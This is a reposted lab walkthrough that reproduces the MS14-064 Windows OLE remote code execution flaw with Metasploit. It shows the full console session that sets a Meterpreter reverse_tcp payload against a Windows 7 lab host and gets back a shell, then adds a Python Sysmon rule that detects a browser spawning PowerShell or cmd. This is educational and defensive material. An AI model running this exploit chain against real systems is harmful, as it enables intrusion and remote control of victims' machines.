MS14-064 Vulnerability Reproduction

Background

Microsoft Windows OLE remote code execution vulnerability. OLE (Object Linking and Embedding) is a technology that lets applications share data and functionality. A remote attacker can exploit this vulnerability to execute arbitrary code through a crafted website; it affects every version from Win95 + IE3 through Win10 + IE11…

Module: exploit/windows/browser/ms14_064_ole_code_execution

Reproduction

System    IP
linux     10.7.10.43
win7      10.7.10.49

msf6 > search ms14-064

Matching Modules
================

   #  Name                                                       Disclosure Date  Rank       Check  Description
   -  ----                                                       ---------------  ----       -----  -----------
   0  exploit/windows/browser/ms14_064_ole_code_execution        2014-11-13       good       No     MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
   1  exploit/windows/fileformat/ms14_064_packager_python        2014-11-12       excellent  No     MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
   2  exploit/windows/fileformat/ms14_064_packager_run_as_admin  2014-10-21       excellent  No     MS14-064 Microsoft Windows OLE Package Manager Code Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/fileformat/ms14_064_packager_run_as_admin                                                                                                     

msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.7.10.43  netmask 255.255.255.0  broadcast 10.7.10.255
        inet6 fe80::20c:29ff:fe3d:e7e0  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:3d:e7:e0  txqueuelen 1000  (Ethernet)
        RX packets 72244  bytes 6467761 (6.1 MiB)
        RX errors 0  dropped 34923  overruns 0  frame 0
        TX packets 51553  bytes 7628452 (7.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1380  bytes 120208 (117.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1380  bytes 120208 (117.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set AllowPowershellPrompt true
AllowPowershellPrompt => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options 

Module options (exploit/windows/browser/ms14_064_ole_code_execution):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   AllowPowershellPrompt  true             yes       Allow exploit to try Powershell
   Retries                true             no        Allow the browser to retry the module
   SRVHOST                0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT                8080             yes       The local port to listen on.
   SSL                    false            no        Negotiate SSL for incoming connections
   SSLCert                                 no        Path to a custom SSL certificate (default is randomly generated)
   TRYUAC                 false            yes       Ask victim to start as Administrator
   URIPATH                                 no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.7.10.43       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP


msf6 exploit(windows/browser/ms14_064_ole_code_execution) > exploit 

Open the resulting URL from the Win7 host and a shell is returned.
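A host-side detection for the behaviour this configuration produces (with AllowPowershellPrompt set to true the browser process ends up launching PowerShell), as an added example that is not part of the original post. It assumes Sysmon Event ID 1 (process creation) records already parsed into dicts with the usual field names, and runs over constructed sample records:

```python
"""Detect a browser process launching a shell, the host-side trace one would
expect when this module's AllowPowershellPrompt option is used.  Added example
(not from the original post); assumes Sysmon Event ID 1 (process creation)
records already parsed into dicts with the usual field names."""
import ntpath

# Browsers that are realistic drive-by victims.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Children a browser should never spawn on its own.
SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(image: str) -> str:
    """Lower-cased file name from a Windows path, tolerant of odd casing."""
    return ntpath.basename(image).lower()


def is_browser_spawned_shell(event: dict) -> bool:
    """True for a process-creation event whose parent is a browser and child a shell."""
    if event.get("EventID") != 1:          # only process-creation records matter
        return False
    return (basename(event.get("ParentImage", "")) in BROWSERS
            and basename(event.get("Image", "")) in SHELLS)


def hunt(events: list) -> list:
    """One alert line per suspicious event, in time order."""
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if is_browser_spawned_shell(ev):
            alerts.append(f"{ev['UtcTime']} {ev['Computer']}: "
                          f"{basename(ev['ParentImage'])} -> {basename(ev['Image'])}")
    return alerts


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2021-03-05 09:11:58", "Computer": "WIN7-LAB",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"EventID": 1, "UtcTime": "2021-03-05 09:11:59", "Computer": "WIN7-LAB",
     "ParentImage": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "Image": "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"},  # tab process, benign
    {"EventID": 3, "UtcTime": "2021-03-05 09:12:00", "Computer": "WIN7-LAB",
     "ParentImage": "", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe"},
    {"EventID": 1, "UtcTime": "2021-03-05 09:12:01", "Computer": "WIN7-LAB",
     "ParentImage": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
]
```

Only the last record trips the rule; the IE tab process and the network event (EventID 3) are ignored.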

References:
https://www.cnblogs.com/5301z/p/6714300.html
https://blog.csdn.net/nzjdsds/article/details/81912349

Reposted from blog.csdn.net/p_utao/article/details/114401118